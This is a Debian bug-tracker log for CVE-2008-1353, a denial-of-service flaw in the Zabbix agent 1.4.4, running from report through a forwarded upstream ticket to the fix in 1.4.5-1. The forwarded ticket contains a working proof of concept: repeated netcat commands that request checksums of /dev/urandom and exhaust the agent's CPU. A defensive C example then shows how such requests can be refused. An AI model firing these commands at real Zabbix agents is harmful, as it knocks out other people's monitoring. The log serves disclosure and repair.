zabbix: CVE-2008-1353 local or remote DoS for authenticated hosts

Related Vulnerabilities: CVE-2008-1353  

Debian Bug report logs - #471678

Package: zabbix; Maintainer for zabbix is Dmitry Smirnov <onlyjob@debian.org>;

Reported by: Nico Golde <nion@debian.org>

Date: Wed, 19 Mar 2008 14:03:04 UTC

Severity: grave

Tags: security

Fixed in version zabbix/1:1.4.5-1

Done: Michael Ablassmeier <abi@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Zabbix Maintainers <kobold-zabbix@debian.org>:
Bug#471678; Package zabbix.


Acknowledgement sent to Nico Golde <nion@debian.org>:
New Bug report received and forwarded. Copy sent to Zabbix Maintainers <kobold-zabbix@debian.org>.


Message #5 received at submit@bugs.debian.org:

From: Nico Golde <nion@debian.org>
To: submit@bugs.debian.org
Subject: zabbix: CVE-2008-1353 local or remote DoS for authenticated hosts
Date: Wed, 19 Mar 2008 15:01:49 +0100
Package: zabbix
Severity: grave
Tags: security

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for zabbix.

CVE-2008-1353[0]:
| zabbix_agentd in ZABBIX 1.4.4 allows remote attackers to cause a
| denial of service (CPU and connection consumption) via multiple
| vfs.file.cksum commands with a special device node such as
| /dev/urandom or /dev/zero.

This should just work for authenticated hosts or hosts with 
a spoofed IP address. However from what I see this is also 
useable for local users.

If you fix this vulnerability please also include the CVE id
in your changelog entry.

For further information:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1353

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.

Information forwarded to debian-bugs-dist@lists.debian.org, Zabbix Maintainers <kobold-zabbix@debian.org>:
Bug#471678; Package zabbix.


Acknowledgement sent to Michael Ablassmeier <abi@grinser.de>:
Extra info received and forwarded to list. Copy sent to Zabbix Maintainers <kobold-zabbix@debian.org>.


Message #10 received at 471678@bugs.debian.org:

From: Michael Ablassmeier <abi@grinser.de>
To: Nico Golde <nion@debian.org>
Cc: 471678@bugs.debian.org
Subject: Re: zabbix: CVE-2008-1353 local or remote DoS for authenticated hosts
Date: Tue, 25 Mar 2008 15:24:53 +0100
hi,

On Wed, Mar 19, 2008 at 03:01:49PM +0100, Nico Golde wrote:
> Hi,
> the following CVE (Common Vulnerabilities & Exposures) id was
> published for zabbix.
> 
> CVE-2008-1353[0]:
> | zabbix_agentd in ZABBIX 1.4.4 allows remote attackers to cause a
> | denial of service (CPU and connection consumption) via multiple
> | vfs.file.cksum commands with a special device node such as
> | /dev/urandom or /dev/zero.
> 
> This should just work for authenticated hosts or hosts with 
> a spoofed IP address. However from what I see this is also 
> useable for local users.

thanks for your report, this issue has been reported to upstream
(ZBX-328) but no patch so far. Waiting for a patch .. 

bye,
    - michael




Information forwarded to debian-bugs-dist@lists.debian.org, Zabbix Maintainers <kobold-zabbix@debian.org>:
Bug#471678; Package zabbix.


Acknowledgement sent to Michael Ablassmeier <abi@grinser.de>:
Extra info received and forwarded to list. Copy sent to Zabbix Maintainers <kobold-zabbix@debian.org>.


Message #15 received at 471678@bugs.debian.org:

From: Michael Ablassmeier <abi@grinser.de>
To: 471678@bugs.debian.org
Subject: [support@zabbix.com: [ZABBIX] Closed: (ZBX-328) Possible DoS against zabbix-agentd]
Date: Tue, 25 Mar 2008 15:54:58 +0100
hi,

see upstream's response.

----- Forwarded message from "Alexei Vladishev (ZABBIX Support)" <support@zabbix.com> -----

From: "Alexei Vladishev (ZABBIX Support)" <support@zabbix.com>
Date: Tue, 25 Mar 2008 16:31:18 +0200 (EET)
To: abi@debian.org
Subject: [ZABBIX] Closed: (ZBX-328) Possible DoS against zabbix-agentd


     [ https://support.zabbix.com/browse/ZBX-328?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Alexei Vladishev closed ZBX-328.
--------------------------------

    Resolution: Fixed

The problem was fixed a couple of months ago. Please wait for 1.4.5. It will be released this week.

Alexei

> Possible DoS against zabbix-agentd
> ----------------------------------
>
>                 Key: ZBX-328
>                 URL: https://support.zabbix.com/browse/ZBX-328
>             Project: ZABBIX
>          Issue Type: Bug
>          Components: Agent (Unix)
>         Environment: Debian etch, kernel 2.6.18, Intel(R) Pentium(R) 4 CPU 2.80GHz
>            Reporter: Milen Rangelov
>            Assignee: Alexei Vladishev
>
> An authorized host can cause the zabbix_agentd to hang, overconsuming CPU resources.
> This can be triggered by sending the agent a file checksum request (vfs.file.cksum[file]) with file argument being some "special" device file like /dev/zero or /dev/urandom (the latter raises kernel CPU usage even more).
> If the malicious user sends <number_of_zabbix_agentd_children> requests, then the zabbix_agentd service will not be able to serve any requests until it's restarted.
> Here's an example session:
> ------------
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [1] 24429
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [2] 24431
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [3] 24433
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [4] 24435
> ...and some output from top:
> <snip>
> Tasks: 183 total,   5 running, 178 sleeping,   0 stopped,   0 zombie 
> Cpu(s):  2.0%us, 97.0%sy,  1.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
> <snip>
>     PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
> 24381 zabbix    30   5  5056 1032  768 R   65  0.1   4:16.01 zabbix_agentd
> 24382 zabbix    30   5  5068 1044  776 R   50  0.1   4:12.18 zabbix_agentd
> 24380 zabbix    30   5  5068 1044  776 R   50  0.1   4:01.24 zabbix_agentd
> 24379 zabbix    30   5  5056 1036  772 R   31  0.1   4:08.24 zabbix_agentd
> ------------------------
> zabbix_agentd accepts new connections, but does not serve them.
> The malicious user needs to connect from an authorized host, but it's not so hard to spoof it if he's on the same ethernet segment as the host running the zabbix_agent.

-- 
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators: https://support.zabbix.com/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira

        

----- End forwarded message -----
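
Added example (not part of the bug log, and not the upstream 1.4.5 change, which this page does not show): one way a checksum routine can refuse the special device nodes named in ZBX-328 is to open the path, `fstat()` the descriptor, and continue only for regular files while reading no more than the reported size. `guarded_file_cksum`, `CKSUM_MAX_BYTES` and the CRC-32 stand-in are hypothetical names and choices made for this example.

```c
/* Added example: hypothetical guard, not Zabbix source code. */
#include <fcntl.h>
#include <stdint.h>
#include <sys/stat.h>
#include <unistd.h>

#define CKSUM_MAX_BYTES (64L * 1024 * 1024)   /* assumed per-request cap */

/* Bitwise CRC-32 (IEEE, reflected); a stand-in for the agent's checksum. */
static uint32_t crc32_update(uint32_t crc, const unsigned char *p, size_t n)
{
    while (n--) {
        crc ^= *p++;
        for (int k = 0; k < 8; k++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return crc;
}

/* Returns 0 and stores the checksum, or -1 if the path is refused. */
int guarded_file_cksum(const char *path, uint32_t *out)
{
    unsigned char buf[4096];
    struct stat st;
    uint32_t crc = 0xFFFFFFFFu;
    off_t left;
    ssize_t n;
    /* O_NONBLOCK: opening a FIFO with no writer must not hang the worker. */
    int fd = open(path, O_RDONLY | O_NONBLOCK);
    if (fd < 0) return -1;
    /* fstat() on the descriptor: no check/use race on the path name. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_size > CKSUM_MAX_BYTES) {
        close(fd);          /* /dev/zero, /dev/urandom and FIFOs end here */
        return -1;
    }
    for (left = st.st_size; left > 0; left -= n) {   /* bounded by st_size */
        n = read(fd, buf, left < (off_t)sizeof buf ? (size_t)left : sizeof buf);
        if (n <= 0) break;
        crc = crc32_update(crc, buf, (size_t)n);
    }
    close(fd);
    *out = crc ^ 0xFFFFFFFFu;
    return left == 0 ? 0 : -1;   /* short read or error: refuse */
}

int main(void)
{
    uint32_t v = 0;
    return guarded_file_cksum("/dev/urandom", &v) == -1 ? 0 : 1;   /* refused */
}
```

A file-type check bounds the work done per request; it does not replace limiting which hosts may query the agent.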




Information forwarded to debian-bugs-dist@lists.debian.org, Zabbix Maintainers <kobold-zabbix@debian.org>:
Bug#471678; Package zabbix.


Acknowledgement sent to Nico Golde <nion@debian.org>:
Extra info received and forwarded to list. Copy sent to Zabbix Maintainers <kobold-zabbix@debian.org>.


Message #20 received at 471678@bugs.debian.org:

From: Nico Golde <nion@debian.org>
To: 471678@bugs.debian.org
Subject: Re: zabbix: CVE-2008-1353 local or remote DoS for authenticated hosts
Date: Tue, 25 Mar 2008 16:29:04 +0100
Hi Michael,
* Michael Ablassmeier <abi@grinser.de> [2008-03-25 16:25]:
> On Wed, Mar 19, 2008 at 03:01:49PM +0100, Nico Golde wrote:
[...] 
> > This should just work for authenticated hosts or hosts with 
> > a spoofed IP address. However from what I see this is also 
> > useable for local users.
> 
> thanks for your report, this issue has been reported to upstream
> (ZBX-328) but no patch so far. Waiting for a patch .. 

I also already contacted them for a patch. They told me they 
will do a new release this week that fixes the issue and it 
is already fixed in the beta version.

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.

Reply sent to Michael Ablassmeier <abi@debian.org>:
You have taken responsibility.


Notification sent to Nico Golde <nion@debian.org>:
Bug acknowledged by developer.


Message #25 received at 471678-close@bugs.debian.org:

From: Michael Ablassmeier <abi@debian.org>
To: 471678-close@bugs.debian.org
Subject: Bug#471678: fixed in zabbix 1:1.4.5-1
Date: Thu, 27 Mar 2008 12:17:08 +0000
Source: zabbix
Source-Version: 1:1.4.5-1

We believe that the bug you reported is fixed in the latest version of
zabbix, which is due to be installed in the Debian FTP archive:

zabbix-agent_1.4.5-1_amd64.deb
  to pool/main/z/zabbix/zabbix-agent_1.4.5-1_amd64.deb
zabbix-frontend-php_1.4.5-1_all.deb
  to pool/main/z/zabbix/zabbix-frontend-php_1.4.5-1_all.deb
zabbix-server-mysql_1.4.5-1_amd64.deb
  to pool/main/z/zabbix/zabbix-server-mysql_1.4.5-1_amd64.deb
zabbix-server-pgsql_1.4.5-1_amd64.deb
  to pool/main/z/zabbix/zabbix-server-pgsql_1.4.5-1_amd64.deb
zabbix_1.4.5-1.diff.gz
  to pool/main/z/zabbix/zabbix_1.4.5-1.diff.gz
zabbix_1.4.5-1.dsc
  to pool/main/z/zabbix/zabbix_1.4.5-1.dsc
zabbix_1.4.5.orig.tar.gz
  to pool/main/z/zabbix/zabbix_1.4.5.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 471678@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Michael Ablassmeier <abi@debian.org> (supplier of updated zabbix package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


Format: 1.7
Date: Thu, 27 Mar 2008 12:15:28 +0100
Source: zabbix
Binary: zabbix-agent zabbix-server-mysql zabbix-server-pgsql zabbix-frontend-php
Architecture: source amd64 all
Version: 1:1.4.5-1
Distribution: unstable
Urgency: high
Maintainer: abi@grinser.de
Changed-By: Michael Ablassmeier <abi@debian.org>
Description: 
 zabbix-agent - software for monitoring of your networks -- agent
 zabbix-frontend-php - software for monitoring of your servers -- php frontend
 zabbix-server-mysql - software for monitoring of your networks -- server
 zabbix-server-pgsql - software for monitoring of your networks -- server
Closes: 471678
Changes: 
 zabbix (1:1.4.5-1) unstable; urgency=high
 .
   * New upstream release
   * Fixed remote DoS (CVE-2008-1353) Closes: #471678





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Wed, 30 Apr 2008 07:48:19 GMT)


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 15:01:47 2019; Machine Name: buxtehude
